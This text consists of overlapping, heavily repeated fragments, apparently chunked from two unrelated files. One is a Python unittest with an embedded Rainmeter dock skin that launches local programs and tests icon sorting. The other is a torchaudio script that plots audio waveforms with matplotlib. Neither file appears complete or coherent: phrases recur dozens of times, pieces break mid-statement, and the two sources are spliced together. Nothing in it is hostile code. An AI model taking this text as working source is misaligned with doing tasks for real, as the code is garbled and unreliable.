;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name= Config= Description= Instructions= Version=", "program\", \"video editor\", \"stackoverflow help\", \"movie maker\", \"Terraria\"] icons = mainutils.sort_by_ini(icons, ini_str=test_ini) for", "= [\"new program\", \"video editor\", \"stackoverflow help\", \"movie maker\", \"Terraria\"] icons = mainutils.sort_by_ini(icons,", "assert T(\"Dota 2\") assert T(\"Photoshop\") def test_sorting_by_ini(self): icon_names = [\"Terraria\", \"movie maker\", \"video", "IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty] IfEqualValue=0 ;--------------------------------------------------------------------------- ; APPLICATIONS [video editor] Meter=Button Y=2R", "icon_name in icon_names] correctly_sorted_names = [\"new program\", \"video editor\", \"stackoverflow help\", \"movie maker\",", "; MEASURES MEASURES [MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin] Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL [MeasureBin2]", "= \"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock ------------------------------------------------------------------------ ;Metadata added by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata]", "junk\\video editor icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video editor.exe\"] [stackoverflow help] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow", "for correct_name, actual_icon in zip(correctly_sorted_names, icons): assert actual_icon.name == correct_name, \"Incorrectly sorted icons\"", "[Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock ------------------------------------------------------------------------ ;Metadata added by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name= Config=", "import icon_get import unittest import mainutils import iconmanager test_ini = \"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL>", "IconEmpty] IfEqualValue=0 ;--------------------------------------------------------------------------- ; APPLICATIONS [video editor] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video editor icon.png\"", "in icon_names] correctly_sorted_names = [\"new program\", \"video editor\", \"stackoverflow help\", \"movie maker\", \"Terraria\"]", "maker\", \"Terraria\"] icons = mainutils.sort_by_ini(icons, ini_str=test_ini) for correct_name, actual_icon in zip(correctly_sorted_names, icons): assert", "License= Variant= Preview= ;End of added Metadata ;----------------------------------------------------------------------- ; MEASURES MEASURES [MeasurePower] Measure=Plugin", "IconFull][!RainmeterShowMeter IconEmpty] IfEqualValue=0 ;--------------------------------------------------------------------------- ; APPLICATIONS [video editor] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video editor", "ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie maker.exe\"] [Terraria] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\"", "junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase): def test_get_urls(self): T = icon_get.get_urls assert T(\"minecraft\") assert T(\"Dota 2\")", "2\") assert T(\"Photoshop\") def test_sorting_by_ini(self): icon_names = [\"Terraria\", \"movie maker\", \"video editor\", \"stackoverflow", "help.exe\"] [movie maker] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie maker icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie maker.exe\"]", "\"video editor\", \"stackoverflow help\", \"movie maker\", \"Terraria\"] icons = mainutils.sort_by_ini(icons, ini_str=test_ini) for correct_name,", "help] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"] [movie maker]", "image_save_path=\".\", app_path=\".\") for icon_name in icon_names] correctly_sorted_names = [\"new program\", \"video editor\", \"stackoverflow", "editor\", \"stackoverflow help\", \"movie maker\", \"Terraria\"] icons = mainutils.sort_by_ini(icons, ini_str=test_ini) for correct_name, actual_icon", "[MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL [BinAction] Measure=Calc Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0", "[!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty] IfEqualValue=0 ;--------------------------------------------------------------------------- ; APPLICATIONS [video editor] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video", "added Metadata ;----------------------------------------------------------------------- ; MEASURES MEASURES [MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin] Measure=Plugin Plugin=RecycleManager.dll", "= mainutils.sort_by_ini(icons, ini_str=test_ini) for correct_name, actual_icon in zip(correctly_sorted_names, icons): assert actual_icon.name == correct_name,", "maker.exe\"] [Terraria] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase): def", "for icon_name in icon_names] correctly_sorted_names = [\"new program\", \"video editor\", \"stackoverflow help\", \"movie", "ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase): def test_get_urls(self): T = icon_get.get_urls assert T(\"minecraft\") assert", "Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie maker icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie maker.exe\"] [Terraria] Meter=Button Y=2R", "icon_get.get_urls assert T(\"minecraft\") assert T(\"Dota 2\") assert T(\"Photoshop\") def test_sorting_by_ini(self): icon_names = [\"Terraria\",", "icon_names] correctly_sorted_names = [\"new program\", \"video editor\", \"stackoverflow help\", \"movie maker\", \"Terraria\"] icons", "ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video editor.exe\"] [stackoverflow help] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help icon.png\" ButtonCommand=!execute", "icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase): def test_get_urls(self): T = icon_get.get_urls assert T(\"minecraft\")", "T = icon_get.get_urls assert T(\"minecraft\") assert T(\"Dota 2\") assert T(\"Photoshop\") def test_sorting_by_ini(self): icon_names", ";Metadata added by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name= Config= Description= Instructions= Version= Tags= License=", "Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin] Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL [MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL", "[!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty] IfEqualValue=0 ;--------------------------------------------------------------------------- ; APPLICATIONS [video", "Tags= License= Variant= Preview= ;End of added Metadata ;----------------------------------------------------------------------- ; MEASURES MEASURES [MeasurePower]", "help\", \"movie maker\", \"Terraria\"] icons = mainutils.sort_by_ini(icons, ini_str=test_ini) for correct_name, actual_icon in zip(correctly_sorted_names,", "Drives=ALL [BinAction] Measure=Calc Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty]", "mainutils.sort_by_ini(icons, ini_str=test_ini) for correct_name, actual_icon in zip(correctly_sorted_names, icons): assert actual_icon.name == correct_name, \"Incorrectly", "\"movie maker\", \"video editor\", \"stackoverflow help\", \"new program\"] icons = [iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\")", "ini_str=test_ini) for correct_name, actual_icon in zip(correctly_sorted_names, icons): assert actual_icon.name == correct_name, \"Incorrectly sorted", "Variant= Preview= ;End of added Metadata ;----------------------------------------------------------------------- ; MEASURES MEASURES [MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll", "MEASURES [MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin] Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL [MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll", "maker] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie maker icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie maker.exe\"] [Terraria] Meter=Button", "IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty] IfEqualValue=0 ;--------------------------------------------------------------------------- ; APPLICATIONS [video editor] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test", "junk\\Terraria icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase): def test_get_urls(self): T = icon_get.get_urls assert", "T(\"Dota 2\") assert T(\"Photoshop\") def test_sorting_by_ini(self): icon_names = [\"Terraria\", \"movie maker\", \"video editor\",", "[MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin] Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL [MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE", "correctly_sorted_names = [\"new program\", \"video editor\", \"stackoverflow help\", \"movie maker\", \"Terraria\"] icons =", "Metadata ;----------------------------------------------------------------------- ; MEASURES MEASURES [MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin] Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT", "Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL [MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL [BinAction] Measure=Calc Formula=MeasureBin IfAboveAction=!execute", "ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase): def test_get_urls(self): T = icon_get.get_urls", "ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"] [movie maker] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test", "Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie maker icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie maker.exe\"] [Terraria] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test", "MEASURES MEASURES [MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin] Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL [MeasureBin2] Measure=Plugin", "Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"] [movie maker] Meter=Button Y=2R", "editor\", \"stackoverflow help\", \"new program\"] icons = [iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\") for icon_name in", "; APPLICATIONS [video editor] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video editor icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video", "ButtonImage=\"E:\\Desktop\\Test junk\\movie maker icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie maker.exe\"] [Terraria] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria", "of added Metadata ;----------------------------------------------------------------------- ; MEASURES MEASURES [MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin] Measure=Plugin", ";----------------------------------------------------------------------- ; MEASURES MEASURES [MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin] Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL", "[\"E:\\Desktop\\Test junk\\movie maker.exe\"] [Terraria] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class", "\"stackoverflow help\", \"movie maker\", \"Terraria\"] icons = mainutils.sort_by_ini(icons, ini_str=test_ini) for correct_name, actual_icon in", "Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock ------------------------------------------------------------------------ ;Metadata added by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name= Config= Description=", "IfEqualValue=0 ;--------------------------------------------------------------------------- ; APPLICATIONS [video editor] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video editor icon.png\" ButtonCommand=!execute", "Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase): def test_get_urls(self): T", "Drives=ALL [MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL [BinAction] Measure=Calc Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull]", "editor.exe\"] [stackoverflow help] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"]" ]
[ "if ylim: axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False) plt.savefig(filename) if __name__ == '__main__': parser = argparse.ArgumentParser()", "import librosa import matplotlib.pyplot as plt def plot_waveform(waveform, sample_rate, filename, title=\"Waveform\", xlim=None, ylim=None):", "as F import torchaudio.transforms as T import librosa import matplotlib.pyplot as plt def", "default=1) parser.add_argument('--gpu', default='0') args = parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu waveform1, sr1 = torchaudio.load(args.input)", "# print(diff.shape) # diff = diff[0.5 * sr1:1 * sr1] print(waveform1.shape) waveform1 =", "axes = plt.subplots(num_channels, 1) if num_channels == 1: axes = [axes] for c", "# diff = waveform2 - waveform1 # print(diff.shape) # diff = diff[0.5 *", "ylim: axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False) plt.savefig(filename) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--input',", "range(num_channels): axes[c].plot(time_axis, waveform[c], linewidth=1) axes[c].grid(True) if num_channels > 1: axes[c].set_ylabel(f'Channel {c+1}') if xlim:", "# diff = diff[0.5 * sr1:1 * sr1] print(waveform1.shape) waveform1 = waveform1[:, :]", "num_frames = waveform.shape time_axis = torch.arange(0, num_frames) / sample_rate figure, axes = plt.subplots(num_channels,", "= diff[0.5 * sr1:1 * sr1] print(waveform1.shape) waveform1 = waveform1[:, :] plot_waveform(waveform1, sr1,", "sr1:1 * sr1] print(waveform1.shape) waveform1 = waveform1[:, :] plot_waveform(waveform1, sr1, filename=args.output, title=\"\", xlim=[args.time1,", "num_frames) / sample_rate figure, axes = plt.subplots(num_channels, 1) if num_channels == 1: axes", "num_channels, num_frames = waveform.shape time_axis = torch.arange(0, num_frames) / sample_rate figure, axes =", "torch.arange(0, num_frames) / sample_rate figure, axes = plt.subplots(num_channels, 1) if num_channels == 1:", "torch import torchaudio import torchaudio.functional as F import torchaudio.transforms as T import librosa", "<filename>tools/save_waveform.py import argparse import os import torch import torchaudio import torchaudio.functional as F", "axes[c].set_ylabel(f'Channel {c+1}') if xlim: axes[c].set_xlim(xlim) if ylim: axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False) plt.savefig(filename) if __name__", "torchaudio.functional as F import torchaudio.transforms as T import librosa import matplotlib.pyplot as plt", "plt.savefig(filename) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--input', default='input.wav') parser.add_argument('--output', default='output.png') parser.add_argument('--time1',", "plt def plot_waveform(waveform, sample_rate, filename, title=\"Waveform\", xlim=None, ylim=None): waveform = waveform.numpy() num_channels, num_frames", "torchaudio.load(args.input) # waveform2, sr2 = torchaudio.load(args.input2) # diff = waveform2 - waveform1 #", "__name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--input', default='input.wav') parser.add_argument('--output', default='output.png') parser.add_argument('--time1', type=float, default=0.5)", "F import torchaudio.transforms as T import librosa import matplotlib.pyplot as plt def plot_waveform(waveform,", "= torch.arange(0, num_frames) / sample_rate figure, axes = plt.subplots(num_channels, 1) if num_channels ==", "== '__main__': parser = argparse.ArgumentParser() parser.add_argument('--input', default='input.wav') parser.add_argument('--output', default='output.png') parser.add_argument('--time1', type=float, default=0.5) parser.add_argument('--time2',", "parser.add_argument('--time2', type=float, default=1) parser.add_argument('--gpu', default='0') args = parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu waveform1, sr1", "# waveform2, sr2 = torchaudio.load(args.input2) # diff = waveform2 - waveform1 # print(diff.shape)", "def plot_waveform(waveform, sample_rate, filename, title=\"Waveform\", xlim=None, ylim=None): waveform = waveform.numpy() num_channels, num_frames =", "axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False) plt.savefig(filename) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--input', default='input.wav')", "torchaudio.transforms as T import librosa import matplotlib.pyplot as plt def plot_waveform(waveform, sample_rate, filename,", "waveform.shape time_axis = torch.arange(0, num_frames) / sample_rate figure, axes = plt.subplots(num_channels, 1) if", "sr1 = torchaudio.load(args.input) # waveform2, sr2 = torchaudio.load(args.input2) # diff = waveform2 -", "parser = argparse.ArgumentParser() parser.add_argument('--input', default='input.wav') parser.add_argument('--output', default='output.png') parser.add_argument('--time1', type=float, default=0.5) parser.add_argument('--time2', type=float, default=1)", "c in range(num_channels): axes[c].plot(time_axis, waveform[c], linewidth=1) axes[c].grid(True) if num_channels > 1: axes[c].set_ylabel(f'Channel {c+1}')", "import matplotlib.pyplot as plt def plot_waveform(waveform, sample_rate, filename, title=\"Waveform\", xlim=None, ylim=None): waveform =", "parser.add_argument('--time1', type=float, default=0.5) parser.add_argument('--time2', type=float, default=1) parser.add_argument('--gpu', default='0') args = parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] =", "linewidth=1) axes[c].grid(True) if num_channels > 1: axes[c].set_ylabel(f'Channel {c+1}') if xlim: axes[c].set_xlim(xlim) if ylim:", "plt.subplots(num_channels, 1) if num_channels == 1: axes = [axes] for c in range(num_channels):", "if xlim: axes[c].set_xlim(xlim) if ylim: axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False) plt.savefig(filename) if __name__ == '__main__':", "= args.gpu waveform1, sr1 = torchaudio.load(args.input) # waveform2, sr2 = torchaudio.load(args.input2) # diff", "{c+1}') if xlim: axes[c].set_xlim(xlim) if ylim: axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False) plt.savefig(filename) if __name__ ==", "'__main__': parser = argparse.ArgumentParser() parser.add_argument('--input', default='input.wav') parser.add_argument('--output', default='output.png') parser.add_argument('--time1', type=float, default=0.5) parser.add_argument('--time2', type=float,", "axes[c].set_xlim(xlim) if ylim: axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False) plt.savefig(filename) if __name__ == '__main__': parser =", "title=\"Waveform\", xlim=None, ylim=None): waveform = waveform.numpy() num_channels, num_frames = waveform.shape time_axis = torch.arange(0,", "os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu waveform1, sr1 = torchaudio.load(args.input) # waveform2, sr2 = torchaudio.load(args.input2) #", "sample_rate, filename, title=\"Waveform\", xlim=None, ylim=None): waveform = waveform.numpy() num_channels, num_frames = waveform.shape time_axis", "axes[c].plot(time_axis, waveform[c], linewidth=1) axes[c].grid(True) if num_channels > 1: axes[c].set_ylabel(f'Channel {c+1}') if xlim: axes[c].set_xlim(xlim)", "1) if num_channels == 1: axes = [axes] for c in range(num_channels): axes[c].plot(time_axis,", "xlim: axes[c].set_xlim(xlim) if ylim: axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False) plt.savefig(filename) if __name__ == '__main__': parser", "= waveform.numpy() num_channels, num_frames = waveform.shape time_axis = torch.arange(0, num_frames) / sample_rate figure,", "parser.add_argument('--gpu', default='0') args = parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu waveform1, sr1 = torchaudio.load(args.input) #", "== 1: axes = [axes] for c in range(num_channels): axes[c].plot(time_axis, waveform[c], linewidth=1) axes[c].grid(True)", "torchaudio import torchaudio.functional as F import torchaudio.transforms as T import librosa import matplotlib.pyplot", "xlim=None, ylim=None): waveform = waveform.numpy() num_channels, num_frames = waveform.shape time_axis = torch.arange(0, num_frames)", "plot_waveform(waveform, sample_rate, filename, title=\"Waveform\", xlim=None, ylim=None): waveform = waveform.numpy() num_channels, num_frames = waveform.shape", "= [axes] for c in range(num_channels): axes[c].plot(time_axis, waveform[c], linewidth=1) axes[c].grid(True) if num_channels >", "import torchaudio import torchaudio.functional as F import torchaudio.transforms as T import librosa import", "= waveform2 - waveform1 # print(diff.shape) # diff = diff[0.5 * sr1:1 *", "figure.suptitle(title) plt.show(block=False) plt.savefig(filename) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--input', default='input.wav') parser.add_argument('--output',", "type=float, default=1) parser.add_argument('--gpu', default='0') args = parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu waveform1, sr1 =", "time_axis = torch.arange(0, num_frames) / sample_rate figure, axes = plt.subplots(num_channels, 1) if num_channels", "if num_channels == 1: axes = [axes] for c in range(num_channels): axes[c].plot(time_axis, waveform[c],", "diff = waveform2 - waveform1 # print(diff.shape) # diff = diff[0.5 * sr1:1", "default='0') args = parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu waveform1, sr1 = torchaudio.load(args.input) # waveform2,", "parser.add_argument('--output', default='output.png') parser.add_argument('--time1', type=float, default=0.5) parser.add_argument('--time2', type=float, default=1) parser.add_argument('--gpu', default='0') args = parser.parse_args()", "waveform.numpy() num_channels, num_frames = waveform.shape time_axis = torch.arange(0, num_frames) / sample_rate figure, axes", "= waveform.shape time_axis = torch.arange(0, num_frames) / sample_rate figure, axes = plt.subplots(num_channels, 1)", "if num_channels > 1: axes[c].set_ylabel(f'Channel {c+1}') if xlim: axes[c].set_xlim(xlim) if ylim: axes[c].set_ylim(ylim) figure.suptitle(title)", "os import torch import torchaudio import torchaudio.functional as F import torchaudio.transforms as T", "filename, title=\"Waveform\", xlim=None, ylim=None): waveform = waveform.numpy() num_channels, num_frames = waveform.shape time_axis =", "axes = [axes] for c in range(num_channels): axes[c].plot(time_axis, waveform[c], linewidth=1) axes[c].grid(True) if num_channels", "args.gpu waveform1, sr1 = torchaudio.load(args.input) # waveform2, sr2 = torchaudio.load(args.input2) # diff =", "waveform1, sr1 = torchaudio.load(args.input) # waveform2, sr2 = torchaudio.load(args.input2) # diff = waveform2", "diff = diff[0.5 * sr1:1 * sr1] print(waveform1.shape) waveform1 = waveform1[:, :] plot_waveform(waveform1,", "as plt def plot_waveform(waveform, sample_rate, filename, title=\"Waveform\", xlim=None, ylim=None): waveform = waveform.numpy() num_channels,", "/ sample_rate figure, axes = plt.subplots(num_channels, 1) if num_channels == 1: axes =", "1: axes = [axes] for c in range(num_channels): axes[c].plot(time_axis, waveform[c], linewidth=1) axes[c].grid(True) if", "= parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu waveform1, sr1 = torchaudio.load(args.input) # waveform2, sr2 =", "* sr1:1 * sr1] print(waveform1.shape) waveform1 = waveform1[:, :] plot_waveform(waveform1, sr1, filename=args.output, title=\"\",", "torchaudio.load(args.input2) # diff = waveform2 - waveform1 # print(diff.shape) # diff = diff[0.5", "parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu waveform1, sr1 = torchaudio.load(args.input) # waveform2, sr2 = torchaudio.load(args.input2)", "T import librosa import matplotlib.pyplot as plt def plot_waveform(waveform, sample_rate, filename, title=\"Waveform\", xlim=None,", "argparse import os import torch import torchaudio import torchaudio.functional as F import torchaudio.transforms", "waveform = waveform.numpy() num_channels, num_frames = waveform.shape time_axis = torch.arange(0, num_frames) / sample_rate", "import argparse import os import torch import torchaudio import torchaudio.functional as F import", "as T import librosa import matplotlib.pyplot as plt def plot_waveform(waveform, sample_rate, filename, title=\"Waveform\",", "if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--input', default='input.wav') parser.add_argument('--output', default='output.png') parser.add_argument('--time1', type=float,", "print(diff.shape) # diff = diff[0.5 * sr1:1 * sr1] print(waveform1.shape) waveform1 = waveform1[:,", "waveform1 # print(diff.shape) # diff = diff[0.5 * sr1:1 * sr1] print(waveform1.shape) waveform1", "parser.add_argument('--input', default='input.wav') parser.add_argument('--output', default='output.png') parser.add_argument('--time1', type=float, default=0.5) parser.add_argument('--time2', type=float, default=1) parser.add_argument('--gpu', default='0') args", "= torchaudio.load(args.input2) # diff = waveform2 - waveform1 # print(diff.shape) # diff =", "waveform[c], linewidth=1) axes[c].grid(True) if num_channels > 1: axes[c].set_ylabel(f'Channel {c+1}') if xlim: axes[c].set_xlim(xlim) if", "default='output.png') parser.add_argument('--time1', type=float, default=0.5) parser.add_argument('--time2', type=float, default=1) parser.add_argument('--gpu', default='0') args = parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES']", "num_channels > 1: axes[c].set_ylabel(f'Channel {c+1}') if xlim: axes[c].set_xlim(xlim) if ylim: axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False)", "plt.show(block=False) plt.savefig(filename) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--input', default='input.wav') parser.add_argument('--output', default='output.png')", "in range(num_channels): axes[c].plot(time_axis, waveform[c], linewidth=1) axes[c].grid(True) if num_channels > 1: axes[c].set_ylabel(f'Channel {c+1}') if", "= argparse.ArgumentParser() parser.add_argument('--input', default='input.wav') parser.add_argument('--output', default='output.png') parser.add_argument('--time1', type=float, default=0.5) parser.add_argument('--time2', type=float, default=1) parser.add_argument('--gpu',", "default='input.wav') parser.add_argument('--output', default='output.png') parser.add_argument('--time1', type=float, default=0.5) parser.add_argument('--time2', type=float, default=1) parser.add_argument('--gpu', default='0') args =", "args = parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu waveform1, sr1 = torchaudio.load(args.input) # waveform2, sr2", "for c in range(num_channels): axes[c].plot(time_axis, waveform[c], linewidth=1) axes[c].grid(True) if num_channels > 1: axes[c].set_ylabel(f'Channel", "import torch import torchaudio import torchaudio.functional as F import torchaudio.transforms as T import", "= plt.subplots(num_channels, 1) if num_channels == 1: axes = [axes] for c in", "= torchaudio.load(args.input) # waveform2, sr2 = torchaudio.load(args.input2) # diff = waveform2 - waveform1", "import torchaudio.transforms as T import librosa import matplotlib.pyplot as plt def plot_waveform(waveform, sample_rate,", "matplotlib.pyplot as plt def plot_waveform(waveform, sample_rate, filename, title=\"Waveform\", xlim=None, ylim=None): waveform = waveform.numpy()", "- waveform1 # print(diff.shape) # diff = diff[0.5 * sr1:1 * sr1] print(waveform1.shape)", "[axes] for c in range(num_channels): axes[c].plot(time_axis, waveform[c], linewidth=1) axes[c].grid(True) if num_channels > 1:", "librosa import matplotlib.pyplot as plt def plot_waveform(waveform, sample_rate, filename, title=\"Waveform\", xlim=None, ylim=None): waveform", "import os import torch import torchaudio import torchaudio.functional as F import torchaudio.transforms as", "1: axes[c].set_ylabel(f'Channel {c+1}') if xlim: axes[c].set_xlim(xlim) if ylim: axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False) plt.savefig(filename) if", "figure, axes = plt.subplots(num_channels, 1) if num_channels == 1: axes = [axes] for", "sr2 = torchaudio.load(args.input2) # diff = waveform2 - waveform1 # print(diff.shape) # diff", "diff[0.5 * sr1:1 * sr1] print(waveform1.shape) waveform1 = waveform1[:, :] plot_waveform(waveform1, sr1, filename=args.output,", "waveform2, sr2 = torchaudio.load(args.input2) # diff = waveform2 - waveform1 # print(diff.shape) #", "waveform2 - waveform1 # print(diff.shape) # diff = diff[0.5 * sr1:1 * sr1]", "* sr1] print(waveform1.shape) waveform1 = waveform1[:, :] plot_waveform(waveform1, sr1, filename=args.output, title=\"\", xlim=[args.time1, args.time2])", "> 1: axes[c].set_ylabel(f'Channel {c+1}') if xlim: axes[c].set_xlim(xlim) if ylim: axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False) plt.savefig(filename)", "argparse.ArgumentParser() parser.add_argument('--input', default='input.wav') parser.add_argument('--output', default='output.png') parser.add_argument('--time1', type=float, default=0.5) parser.add_argument('--time2', type=float, default=1) parser.add_argument('--gpu', default='0')", "import torchaudio.functional as F import torchaudio.transforms as T import librosa import matplotlib.pyplot as", "axes[c].grid(True) if num_channels > 1: axes[c].set_ylabel(f'Channel {c+1}') if xlim: axes[c].set_xlim(xlim) if ylim: axes[c].set_ylim(ylim)", "num_channels == 1: axes = [axes] for c in range(num_channels): 